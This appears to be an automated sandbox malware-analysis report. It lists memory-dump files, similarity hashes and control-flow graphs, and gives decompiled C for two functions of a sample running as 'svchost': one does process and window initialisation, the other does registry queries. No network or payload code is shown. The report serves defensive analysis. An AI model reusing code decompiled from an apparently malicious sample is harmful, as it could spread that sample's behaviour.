    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
    • String ID: AfxOldWndProc423$`4$ime
    • API String ID: 3731301195-158588402
    • Opcode ID: d389d0ed5f8905fea4df925324e2ad6fe00f6e95fc342fb6c0beae535606e1de
    • Instruction ID: 21250f6b29592b4b1635f3a85b5d3ff60d85be4638d5471d884da1f7f9e51988
    • Opcode Fuzzy Hash: d389d0ed5f8905fea4df925324e2ad6fe00f6e95fc342fb6c0beae535606e1de
    • Instruction Fuzzy Hash: 6A51B131900615BFCF21AF64DD48B6F3BA9FF04365F104A2AF915AB2A1C7789D40CB99
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0043C3F0 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 370commemorythreadCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 47 43c3f0-43c451 GetProcessHeap 48 43c453-43c45b OleInitialize 47->48 49 43c465-43c48e GetModuleFileNameA call 471d67 47->49 48->49 52 43c490-43c4a9 call 4833ff 49->52 53 43c4ab-43c4be call 48324d 49->53 58 43c4bf-43c56c call 4833ff SetCurrentDirectoryA call 429ef0 * 3 LoadCursorA GetStockObject call 41fd80 call 4851e0 52->58 53->58 70 43c571-43c584 GetCurrentThreadId 58->70 71 43c586-43c59f 70->71 72 43c5a5-43c5ad 70->72 71->72 73 43c653-43c65d 72->73 74 43c5b3-43c5fe call 40bd00 * 4 72->74 76 43c6bf-43c6c5 73->76 77 43c65f-43c663 73->77 103 43c622-43c626 74->103 104 43c600-43c60b 74->104 81 43c920-43c930 76->81 82 43c6cb-43c78d call 40b5d0 call 483854 call 48a965 call 48a9b1 call 48a146 call 414650 call 48a2aa call 48a222 call 48a9ee call 483892 76->82 79 43c665-43c66f 77->79 80 43c68d-43c6ba call 40bd00 * 2 77->80 85 43c671-43c676 79->85 86 43c688-43c68b 79->86 80->76 125 43c793-43c796 82->125 126 43c87a-43c91b call 413c10 call 40b7d0 call 414590 call 40b7d0 * 2 82->126 85->86 90 43c678-43c682 85->90 86->79 86->80 90->86 103->73 108 43c628-43c633 103->108 106 43c61d-43c620 104->106 107 43c60d-43c615 104->107 106->103 106->104 107->106 110 43c617-43c61a 107->110 111 43c635-43c646 108->111 112 43c64e-43c651 108->112 110->106 111->112 113 43c648-43c64b 111->113 112->73 112->108 113->112 128 43c799-43c7a5 125->128 126->81 130 43c864-43c874 128->130 131 43c7ab 128->131 130->126 130->128 133 43c7ae-43c7c5 call 4135b0 call 413c90 131->133 143 43c7c7-43c7ec call 40c020 * 3 133->143 144 43c7ff-43c83a call 40c020 * 3 133->144 159 43c7f7-43c7fd 143->159 160 43c7ee-43c7f5 143->160 161 43c858-43c85e 144->161 162 43c83c-43c841 144->162 159->161 160->161 161->130 161->133 163 43c843-43c84a 162->163 164 43c84c 162->164 165 43c852-43c856 163->165 164->165 165->161 165->162
    C-Code - Quality: 83%
    			E0043C3F0(intOrPtr __ecx) {
				void* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v52;
				char _v60;
				intOrPtr _v64;
				char _v68;
				char _v76;
				char _v116;
				char _v184;
				char _v444;
				void* __esi;
				void* __ebp;
				intOrPtr _t119;
				struct HICON__* _t131;
				void* _t133;
				signed int _t136;
				intOrPtr _t140;
				signed int _t149;
				intOrPtr* _t152;
				intOrPtr _t158;
				void* _t160;
				void* _t163;
				void* _t166;
				struct HINSTANCE__** _t168;
				struct HINSTANCE__* _t173;
				signed int _t176;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				signed int _t185;
				intOrPtr _t186;
				intOrPtr _t190;
				signed int _t191;
				void* _t194;
				intOrPtr _t196;
				signed int _t204;
				intOrPtr _t209;
				intOrPtr _t216;
				signed int _t218;
				intOrPtr _t225;
				signed int _t227;
				intOrPtr _t231;
				intOrPtr _t241;
				intOrPtr _t242;
				intOrPtr _t243;
				intOrPtr _t244;
				intOrPtr _t246;
				struct HINSTANCE__* _t252;
				intOrPtr _t254;
				void* _t256;
				intOrPtr _t258;
				signed int _t262;
				char* _t265;
				void* _t268;
				intOrPtr _t269;
				void* _t270;
				CHAR** _t273;
				void* _t278;
				void* _t279;
				void* _t280;
				void* _t281;
				void* _t283;
				void* _t284;
				void* _t285;
				struct HINSTANCE__** _t286;
				signed int _t287;
				signed int _t289;
				intOrPtr _t292;
				intOrPtr _t293;
				void* _t294;
				void* _t295;
				intOrPtr _t315;

				_push(0xffffffff);
				_push(E00490233);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t292;
				_t293 = _t292 - 0x1ac;
				_t190 = __ecx;
				_v20 = _t293;
				_v24 = __ecx;
				 *((intOrPtr*)(_t190 + 0x40c)) = GetProcessHeap();
				_t119 =  *0x4926f0; // 0x3
				 *((intOrPtr*)(_t190 + 0xc4)) = _t119;
				_t196 =  *0x4926f4; // 0x0
				 *((intOrPtr*)(_t190 + 0xc8)) = _t196;
				_t246 =  *0x4926f8; // 0x1082d
				 *((intOrPtr*)(_t190 + 0xcc)) = _t246 + 1;
				if( *((intOrPtr*)(_t190 + 0x404)) == 0) {
					 *0x4926e8(0); // executed
					 *((intOrPtr*)(_t190 + 0x404)) = 1;
				}
				GetModuleFileNameA(0,  &_v444, 0x104);
				_t265 = E00471D67( &_v444,  &_v444, 0x5c);
				_t294 = _t293 + 8;
				if(_t265 == 0) {
					_t273 = _t190 + 0xd0;
					E0048324D(_t273, _t273);
					_push( &_v444);
				} else {
					_t273 = _t190 + 0xd0;
					 *_t265 = 0;
					E004833FF(_t273,  &_v444);
					_push(_t265 + 1);
				}
				E004833FF(_t190 + 0xd4);
				SetCurrentDirectoryA( *_t273); // executed
				E00429EF0(_t190 + 0x370, E00401000, E00401000, 0x401002);
				E00429EF0(_t190 + 0x384, E00401000, E00401000, 0x401002);
				E00429EF0(_t190 + 0x3b8, E00401000, E00401000, 0x401002);
				_t131 = LoadCursorA(0, 0x7f00);
				_t133 = E0041FD80("_EL_HideOwner", 0, _t131, GetStockObject(5), 0);
				_t295 = _t294 + 0x14;
				E004851E0(_t190 + 0x3c8, 0x80, _t133, 0x4c9e6c, 0, 0, 0, 0, 0, 0, 0, 0); // executed
				 *((intOrPtr*)(_t190 + 0x228)) = GetCurrentThreadId();
				_t136 =  *0x492704; // 0x687
				if(_t136 > 0) {
					_t244 =  *0x492700; // 0x493f90
					 *((intOrPtr*)(_t190 + 0x198)) = _t244;
					_t262 =  *0x492704; // 0x687
					_t186 =  *0x492700; // 0x493f90
					_t136 = _t186 + _t262;
					 *(_t190 + 0x19c) = _t136;
				}
				_t191 =  *0x492718; // 0x2b
				if(_t191 <= 0) {
					L18:
					_t204 =  *0x492710; // 0x6
					if(_t204 <= 0) {
						L25:
						_t315 =  *0x49270c; // 0x4
						if(_t315 <= 0) {
							L43:
							 *[fs:0x0] = _v16;
							return _t136;
						}
						E0040B5D0( &_v60);
						_v68 = 0x497860;
						_v64 = _v24;
						_v8 = 0;
						E00483854( &_v76);
						_v8 = 2;
						E0048A965( &_v116, _t315, 0x400);
						_t140 =  *0x49270c; // 0x4
						_t209 =  *0x492708; // 0x494618
						_v8 = 3;
						E0048A9B1( &_v116, _t209, _t140, 0);
						_push(0);
						_push(0x1000);
						_push(1);
						_push( &_v116);
						E0048A146( &_v184);
						_push( &_v184);
						_v8 = 4;
						E00414650();
						E0048A2AA( &_v184, _t315);
						_v8 = 3;
						E0048A222( &_v184);
						_v8 = 2;
						E0048A9EE( &_v116);
						_v8 = 0;
						E00483892();
						_t216 =  *0x4926fc; // 0x401004
						_t149 = _v44;
						_v36 = _t216;
						_t218 = _t149 >> 3;
						asm("sbb eax, eax");
						_t152 = ( ~_t149 & _v52) + _t218 * 4;
						if(_t218 <= 0) {
							L41:
							E00413C10(_v24 + 0x104,  &_v68);
							E0040B7D0( &_v60);
							_v68 = 0x497860;
							_v8 = 8;
							E00414590();
							_v68 = 0x497854;
							_v8 = 9;
							E0040B7D0( &_v60);
							_v8 = 0xffffffff;
							_v60 = 0x497850;
							_t136 = E0040B7D0( &_v60);
							goto L43;
						}
						_v40 = _t152;
						_v32 = _t218;
						do {
							_t158 =  *_t152;
							_t194 = 0;
							_t225 =  *((intOrPtr*)(_t158 + 0x18));
							_v28 = _t225;
							if(_t225 <= 0) {
								goto L40;
							}
							_t268 = _t158 + 0x14;
							do {
								_t160 = E004135B0(_t268, _t194, 0);
								_t229 = _t268;
								_t278 = _t160;
								if(E00413C90(_t268, _t194) != 1) {
									_t279 = _t278 + 0x18;
									_t280 = _t279 + E0040C020(_t229, _t279);
									_t163 = E0040C020(_t229, _t280);
									_t85 = _t163 + 0x1c; // 0x4
									_t281 =  *((intOrPtr*)(_t280 + _t85 + 4 +  *(_t280 + _t163 + 0x1c) * 4)) + _t280 + _t85 + 4 +  *(_t280 + _t163 + 0x1c) * 4 + 4;
									_t166 = E0040C020( *(_t280 + _t163 + 0x1c), _t281);
									_t231 =  *((intOrPtr*)(_t166 + _t281 + 0xc));
									_t295 = _t295 + 0xc;
									_t168 = _t166 + _t281 + 0xc + 8;
									__eflags = _t231;
									if(_t231 <= 0) {
										goto L39;
									} else {
										goto L35;
									}
									do {
										L35:
										_t252 =  *_t168;
										__eflags = _t252 - 0xffffffff;
										if(_t252 == 0xffffffff) {
											 *_t168 = 0;
										} else {
											 *_t168 = _t252 + _v36;
										}
										_t168 =  &(_t168[2]);
										_t231 = _t231 - 1;
										__eflags = _t231;
									} while (_t231 != 0);
									goto L39;
								}
								_t283 = _t278 + 0x18;
								_t284 = _t283 + E0040C020(_t229, _t283);
								_t285 = _t284 + E0040C020(_t229, _t284) + 0xc;
								_t286 = _t285 + E0040C020(_t229, _t285);
								_t295 = _t295 + 0xc;
								_t173 =  *_t286;
								if(_t173 == 0xffffffff) {
									 *_t286 = 0;
								} else {
									 *_t286 = _t173 + _v36;
								}
								L39:
								_t194 = _t194 + 1;
							} while (_t194 < _v28);
							L40:
							_t152 = _v40 + 4;
							_t227 = _v32 - 1;
							_v40 = _t152;
							_v32 = _t227;
						} while (_t227 != 0);
						goto L41;
					}
					_t287 = 0;
					if(_t204 <= 0) {
						L24:
						_t254 =  *0x492714; // 0x492c60
						_push(_t204 << 2);
						E0040BD00(_v24 + 0x120, _t254);
						_t176 =  *0x492710; // 0x6
						_push(_t176 * 4);
						_t136 = E0040BD00(_v24 + 0x134, 0);
						goto L25;
					} else {
						goto L20;
					}
					do {
						L20:
						_t177 =  *0x492714; // 0x492c60
						_t178 =  *((intOrPtr*)(_t177 + _t287 * 4));
						if(_t178 != 0) {
							_t43 = _t178 + 0x78; // 0x418a90
							_t179 =  *_t43;
							if(_t179 != 0) {
								 *_t179(1, E00418A70, 0);
								_t204 =  *0x492710; // 0x6
							}
						}
						_t287 = _t287 + 1;
					} while (_t287 < _t204);
					goto L24;
				} else {
					_t269 = _v24;
					_t289 = _t191 * 4;
					_push(_t289);
					E0040BD00(_t269 + 0x170, 0);
					_push(_t289);
					E0040BD00(_t269 + 0x184, 0);
					_t270 = _t269 + 0x148;
					_push(_t289);
					E0040BD00(_t270, 0);
					_push(_t289);
					E0040BD00(_v24 + 0x15c, 0);
					_t185 = 0;
					if(_t191 <= 0) {
						L13:
						_t136 = 0;
						if(_t191 <= 0) {
							goto L18;
						} else {
							goto L14;
						}
						do {
							L14:
							_t241 =  *0x492720; // 0x4927d0
							_t242 =  *((intOrPtr*)(_t241 + _t136 * 4));
							if(_t136 >= 0) {
								_t256 = _v24 + 0x15c;
								if(_t136 <  *(_t256 + 0x10) >> 2) {
									 *((intOrPtr*)( *((intOrPtr*)(_t256 + 8)) + _t136 * 4)) = _t242;
								}
							}
							_t136 = _t136 + 1;
						} while (_t136 < _t191);
						goto L18;
					} else {
						goto L9;
					}
					do {
						L9:
						_t258 =  *0x49271c; // 0x492724
						_t243 =  *((intOrPtr*)(_t258 + _t185 * 4));
						if(_t185 >= 0 && _t185 <  *(_t270 + 0x10) >> 2) {
							 *((intOrPtr*)( *((intOrPtr*)(_t270 + 8)) + _t185 * 4)) = _t243;
						}
						_t185 = _t185 + 1;
					} while (_t185 < _t191);
					goto L13;
				}
			}


















































































    0x0043c3f3
    0x0043c3f5
    0x0043c400
    0x0043c401
    0x0043c408
    0x0043c411
    0x0043c413
    0x0043c416
    0x0043c41f
    0x0043c425
    0x0043c42a
    0x0043c430
    0x0043c43c
    0x0043c442
    0x0043c44b
    0x0043c451
    0x0043c455
    0x0043c45b
    0x0043c45b
    0x0043c473
    0x0043c487
    0x0043c489
    0x0043c48e
    0x0043c4ab
    0x0043c4b3
    0x0043c4be
    0x0043c490
    0x0043c490
    0x0043c49f
    0x0043c4a2
    0x0043c4a8
    0x0043c4a8
    0x0043c4c5
    0x0043c4cd
    0x0043c4e8
    0x0043c502
    0x0043c51c
    0x0043c528
    0x0043c558
    0x0043c55d
    0x0043c56c
    0x0043c577
    0x0043c57d
    0x0043c584
    0x0043c586
    0x0043c58c
    0x0043c592
    0x0043c598
    0x0043c59d
    0x0043c59f
    0x0043c59f
    0x0043c5a5
    0x0043c5ad
    0x0043c653
    0x0043c653
    0x0043c65d
    0x0043c6bf
    0x0043c6bf
    0x0043c6c5
    0x0043c920
    0x0043c925
    0x0043c930
    0x0043c930
    0x0043c6ce
    0x0043c6d6
    0x0043c6dd
    0x0043c6e3
    0x0043c6e6
    0x0043c6f3
    0x0043c6f7
    0x0043c6fc
    0x0043c701
    0x0043c70f
    0x0043c712
    0x0043c717
    0x0043c718
    0x0043c720
    0x0043c722
    0x0043c729
    0x0043c737
    0x0043c738
    0x0043c73c
    0x0043c747
    0x0043c752
    0x0043c755
    0x0043c75d
    0x0043c761
    0x0043c766
    0x0043c769
    0x0043c76e
    0x0043c774
    0x0043c77a
    0x0043c77f
    0x0043c784
    0x0043c78a
    0x0043c78d
    0x0043c87a
    0x0043c887
    0x0043c88f
    0x0043c894
    0x0043c89e
    0x0043c8a5
    0x0043c8aa
    0x0043c8b1
    0x0043c905
    0x0043c90d
    0x0043c914
    0x0043c91b
    0x00000000
    0x0043c91b
    0x0043c793
    0x0043c796
    0x0043c799
    0x0043c799
    0x0043c79b
    0x0043c79d
    0x0043c7a2
    0x0043c7a5
    0x00000000
    0x00000000
    0x0043c7ab
    0x0043c7ae
    0x0043c7b3
    0x0043c7b9
    0x0043c7bb
    0x0043c7c5
    0x0043c7ff
    0x0043c808
    0x0043c80b
    0x0043c814
    0x0043c820
    0x0043c825
    0x0043c82a
    0x0043c832
    0x0043c835
    0x0043c838
    0x0043c83a
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0043c83c
    0x0043c83c
    0x0043c83c
    0x0043c83e
    0x0043c841
    0x0043c84c
    0x0043c843
    0x0043c848
    0x0043c848
    0x0043c852
    0x0043c855
    0x0043c855
    0x0043c855
    0x00000000
    0x0043c83c
    0x0043c7c7
    0x0043c7d0
    0x0043c7d8
    0x0043c7e2
    0x0043c7e4
    0x0043c7e7
    0x0043c7ec
    0x0043c7f7
    0x0043c7ee
    0x0043c7f3
    0x0043c7f3
    0x0043c858
    0x0043c85b
    0x0043c85c
    0x0043c864
    0x0043c86a
    0x0043c86d
    0x0043c86e
    0x0043c871
    0x0043c871
    0x00000000
    0x0043c799
    0x0043c65f
    0x0043c663
    0x0043c68d
    0x0043c690
    0x0043c699
    0x0043c6a1
    0x0043c6a6
    0x0043c6b2
    0x0043c6ba
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0043c665
    0x0043c665
    0x0043c665
    0x0043c66a
    0x0043c66f
    0x0043c671
    0x0043c671
    0x0043c676
    0x0043c680
    0x0043c682
    0x0043c682
    0x0043c676
    0x0043c688
    0x0043c689
    0x00000000
    0x0043c5b3
    0x0043c5b3
    0x0043c5b6
    0x0043c5bd
    0x0043c5c6
    0x0043c5cb
    0x0043c5d4
    0x0043c5d9
    0x0043c5df
    0x0043c5e4
    0x0043c5ec
    0x0043c5f5
    0x0043c5fa
    0x0043c5fe
    0x0043c622
    0x0043c622
    0x0043c626
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0043c628
    0x0043c628
    0x0043c628
    0x0043c630
    0x0043c633
    0x0043c638
    0x0043c646
    0x0043c64b
    0x0043c64b
    0x0043c646
    0x0043c64e
    0x0043c64f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0043c600
    0x0043c600
    0x0043c600
    0x0043c608
    0x0043c60b
    0x0043c61a
    0x0043c61a
    0x0043c61d
    0x0043c61e
    0x00000000
    0x0043c600

    APIs
    • GetProcessHeap.KERNEL32 ref: 0043C419
    • OleInitialize.OLE32(00000000), ref: 0043C455
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0043C473
    • SetCurrentDirectoryA.KERNELBASE(?,?), ref: 0043C4CD
    • LoadCursorA.USER32(00000000,00007F00), ref: 0043C528
    • GetStockObject.GDI32(00000005), ref: 0043C549
    • GetCurrentThreadId.KERNEL32 ref: 0043C571
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Current$CursorDirectoryFileHeapInitializeLoadModuleNameObjectProcessStockThread
    • String ID: $'I$0<A$PFA$_EL_HideOwner$`,I$`xI
    • API String ID: 3783217854-3451745729
    • Opcode ID: 566765c6b1c5a76fbc1fb93bdf602344aaa7354453cf4076cf6c4ae38e5853d1
    • Instruction ID: a5d35e6d2807c6f631299a2b09cd0150896d184c5175dc3ca22c23d1cac2fe03
    • Opcode Fuzzy Hash: 566765c6b1c5a76fbc1fb93bdf602344aaa7354453cf4076cf6c4ae38e5853d1
    • Instruction Fuzzy Hash: 79E1C270A00205ABCB14EF95CC92BEE77B4FF58708F14417EE905B7282DB786A45CB99
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040AFF0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 276registryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 166 40aff0-40b062 call 40ae90 RegOpenKeyExA 169 40b068-40b092 RegQueryValueExA 166->169 170 40b2ec-40b304 166->170 173 40b2e1-40b2e6 RegCloseKey 169->173 174 40b098-40b09f 169->174 171 40b306-40b310 170->171 172 40b33c-40b346 170->172 177 40b330-40b33a 171->177 178 40b312-40b313 171->178 179 40b348-40b349 172->179 180 40b36c-40b374 call 4147a0 172->180 173->170 175 40b0b0-40b0b3 174->175 176 40b0a1-40b0a9 174->176 183 40b0b5-40b0b8 175->183 184 40b0ba-40b0c1 175->184 181 40b0da-40b0de 176->181 182 40b0ab 176->182 188 40b37d-40b3a0 call 4832c2 177->188 186 40b324-40b32e 178->186 187 40b315-40b316 178->187 189 40b368-40b36a 179->189 190 40b34b-40b34c 179->190 191 40b377-40b37b 180->191 181->173 195 40b0e4 181->195 182->173 183->184 192 40b0c3-40b0c6 183->192 184->181 184->192 186->188 187->188 196 40b318-40b322 187->196 189->191 190->188 197 40b34e-40b366 call 414830 190->197 191->188 192->173 198 40b0cc-40b0d4 192->198 200 40b196-40b1be ExpandEnvironmentStringsA 195->200 201 40b0eb-40b10e call 40b5d0 call 40b5f0 195->201 202 40b1de-40b201 call 40b5d0 call 40b5f0 195->202 196->188 197->188 198->173 198->181 200->173 206 40b1c4-40b1d9 RegCloseKey 200->206 216 40b180-40b191 201->216 217 40b110-40b129 RegQueryValueExA 201->217 214 40b207-40b222 RegQueryValueExA 202->214 215 40b2cb-40b2d8 202->215 206->188 214->215 219 40b228-40b26a RegCloseKey ExpandEnvironmentStringsA call 40b5d0 call 40b5f0 214->219 218 40b2dc call 40b7d0 215->218 216->218 217->216 220 40b12b-40b13b RegCloseKey 217->220 218->173 234 40b2b5-40b2c6 call 40b7d0 219->234 235 40b26c-40b2b0 ExpandEnvironmentStringsA call 4147a0 call 40b7d0 * 2 219->235 221 40b13d-40b14c call 4147a0 220->221 222 40b14e-40b163 call 414830 220->222 231 40b165-40b17b call 40b7d0 221->231 222->231 231->188 234->215 235->188
    C-Code - Quality: 93%
    			E0040AFF0() {
				void* __ebp;
				intOrPtr _t94;
				long _t98;
				CHAR** _t100;
				CHAR* _t101;
				void* _t102;
				intOrPtr _t105;
				intOrPtr _t107;
				void* _t108;
				int _t114;
				signed int _t115;
				intOrPtr _t136;
				void* _t140;
				intOrPtr* _t155;
				intOrPtr _t169;
				intOrPtr _t174;
				void* _t175;
				void* _t176;

				_push(0xffffffff);
				_push(E0048DCE0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t174;
				_t175 = _t174 - 0x54;
				_t94 =  *0x4b8924; // 0x4b8938
				 *((intOrPtr*)(_t175 + 0x14)) = _t94;
				_t169 =  *((intOrPtr*)(_t175 + 0x84));
				 *((intOrPtr*)(_t175 + 0x80)) = 0;
				E0040AE90(_t169,  *((intOrPtr*)(_t175 + 0x84)), _t175 + 0x28, _t175 + 0x18, _t175 + 0x18, _t169);
				_t176 = _t175 + 0x14;
				_t98 = RegOpenKeyExA( *(_t175 + 0x34),  *(_t175 + 0x28), 0, 0x20019, _t176 + 0x10); // executed
				if(_t98 != 0) {
					L29:
					asm("sbb ebp, ebp");
					_t100 =  *((intOrPtr*)(_t176 + 0x7c)) + ( ~(_t169 - 1) + 3 + ( ~(_t169 - 1) + 3) * 2) * 4;
					if(_t100[2] != 0) {
						_t136 =  *((intOrPtr*)(_t176 + 0x80));
						if(_t136 == 0) {
							_t101 = E004147A0(_t136,  *_t100);
							_t176 = _t176 + 4;
							L42:
							 *( *(_t176 + 0x74)) = _t101;
							L43:
							 *((intOrPtr*)(_t176 + 0x6c)) = 0xffffffff;
							_t102 = E004832C2(_t176 + 0x14);
							 *[fs:0x0] =  *((intOrPtr*)(_t176 + 0x64));
							return _t102;
						}
						_t140 = _t136 - 1;
						if(_t140 == 0) {
							_t101 =  *_t100;
							goto L42;
						}
						if(_t140 == 1) {
							_push( *((intOrPtr*)( &(( *_t100)[8]) - 4)));
							_t105 = E00414830( &(( *_t100)[8]));
							_t155 =  *((intOrPtr*)(_t176 + 0x7c));
							_t176 = _t176 + 8;
							 *_t155 = _t105;
						}
						goto L43;
					}
					_t107 =  *((intOrPtr*)(_t176 + 0x80));
					if(_t107 == 0) {
						 *( *(_t176 + 0x74)) = 0;
					} else {
						_t108 = _t107 - 1;
						if(_t108 == 0) {
							 *( *(_t176 + 0x74)) = 0;
						} else {
							if(_t108 == 1) {
								 *( *(_t176 + 0x74)) = 0;
							}
						}
					}
					goto L43;
				}
				 *((intOrPtr*)(_t176 + 0x9c)) = 0;
				if(RegQueryValueExA( *(_t176 + 0x14),  *(_t176 + 0x18), 0, _t176 + 0x1c, 0, _t176 + 0x84) != 0) {
					L28:
					RegCloseKey( *(_t176 + 0x10));
					goto L29;
				}
				_t114 =  *(_t176 + 0x1c);
				if(_t114 != 3) {
					if(_t114 == 1 || _t114 == 2) {
						if( *((intOrPtr*)(_t176 + 0x80)) == 0) {
							goto L10;
						}
						goto L8;
					} else {
						L8:
						if(_t114 != 4 ||  *((intOrPtr*)(_t176 + 0x80)) != 1) {
							goto L28;
						} else {
							L10:
							_t115 = _t114 - 1;
							if(_t115 > 3) {
								goto L28;
							}
							switch( *((intOrPtr*)(_t115 * 4 +  &M0040B3A4))) {
								case 0:
									E0040B5D0(_t176 + 0x28);
									 *((char*)(_t176 + 0x70)) = 1;
									_t167 = E0040B5F0(_t176 + 0x28,  *(_t176 + 0x84));
									if(_t167 == 0 || RegQueryValueExA( *(_t176 + 0x10),  *(_t176 + 0x18), 0, 0, _t167, _t176 + 0x84) != 0) {
										 *((char*)(_t176 + 0x6c)) = 0;
										 *(_t176 + 0x28) = 0x494630;
										_t39 = _t176 + 0x28; // 0x494630
										_t147 = _t39;
										goto L27;
									} else {
										_t149 =  *(_t176 + 0x10);
										RegCloseKey( *(_t176 + 0x10));
										if( *(_t176 + 0x1c) != 1) {
											_push( *(_t176 + 0x84));
											_t124 = E00414830(_t167);
											_t150 =  *((intOrPtr*)(_t176 + 0x7c));
											_t176 = _t176 + 8;
											 *_t150 = _t124;
										} else {
											_t126 = E004147A0(_t149, _t167);
											_t161 =  *((intOrPtr*)(_t176 + 0x78));
											_t176 = _t176 + 4;
											 *_t161 = _t126;
										}
										 *((char*)(_t176 + 0x6c)) = 0;
										 *(_t176 + 0x28) = 0x494630;
										E0040B7D0(_t176 + 0x28);
										goto L43;
									}
								case 1:
									__ecx = __esp + 0x50;
									E0040B5D0(__esp + 0x50) =  *(__esp + 0x84);
									__ecx = __esp + 0x50;
									 *((char*)(__esp + 0x70)) = 2;
									__edi = E0040B5F0(__esp + 0x50,  *(__esp + 0x84));
									if(__edi == 0) {
										L26:
										 *((char*)(__esp + 0x6c)) = 0;
										 *(__esp + 0x50) = 0x494630;
										_t74 = __esp + 0x50; // 0x494630
										__ecx = _t74;
										L27:
										E0040B7D0(_t147);
										goto L28;
									}
									__edx =  *(__esp + 0x18);
									__eax =  *(__esp + 0x10);
									__ecx = __esp + 0x84;
									if(RegQueryValueExA( *(__esp + 0x10),  *(__esp + 0x18), 0, 0, __edi, __esp + 0x84) != 0) {
										goto L26;
									}
									__ecx =  *(__esp + 0x10);
									__eax = RegCloseKey( *(__esp + 0x10));
									__eax = ExpandEnvironmentStringsA(__edi, 0, 0);
									__ecx = __esp + 0x3c;
									 *(__esp + 0x84) = __eax;
									__eax = E0040B5D0(__esp + 0x3c);
									__edx =  *(__esp + 0x84);
									__ecx = __esp + 0x3c;
									 *((char*)(__esp + 0x70)) = 3;
									__esi = E0040B5F0(__ecx,  *(__esp + 0x84));
									if(__esi == 0) {
										__ecx = __esp + 0x3c;
										 *((char*)(__esp + 0x6c)) = 2;
										 *(__esp + 0x3c) = 0x494630;
										__eax = E0040B7D0(__esp + 0x3c);
										goto L26;
									}
									 *(__esp + 0x84) = ExpandEnvironmentStringsA(__edi, __esi,  *(__esp + 0x84));
									__eax = E004147A0(__ecx, __esi);
									__ecx =  *(__esp + 0x78);
									__esi = 0x494630;
									 *((char*)(__esp + 0x6c)) = 2;
									 *( *(__esp + 0x78)) = __eax;
									__ecx = __esp + 0x3c;
									 *(__esp + 0x3c) = 0x494630;
									__eax = E0040B7D0(__esp + 0x3c);
									__ecx = __esp + 0x50;
									 *((char*)(__esp + 0x6c)) = 0;
									 *(__esp + 0x50) = 0x494630;
									__eax = E0040B7D0(__ecx);
									goto L43;
								case 2:
									__ecx =  *(__esp + 0x18);
									__edx = __esp + 0x84;
									__eax = __esp + 0x24;
									_push(__esp + 0x84);
									__edx =  *(__esp + 0x14);
									_push(__eax);
									_push(__edi);
									 *((intOrPtr*)(__esp + 0x9c)) = 4;
									if(ExpandEnvironmentStringsA(__edx, __ecx, __edi) != 0) {
										goto L28;
									}
									 *(__esp + 0x10) = RegCloseKey( *(__esp + 0x10));
									__ecx =  *(__esp + 0x74);
									__edx =  *(__esp + 0x24);
									 *__ecx =  *(__esp + 0x24);
									goto L43;
							}
						}
					}
				}
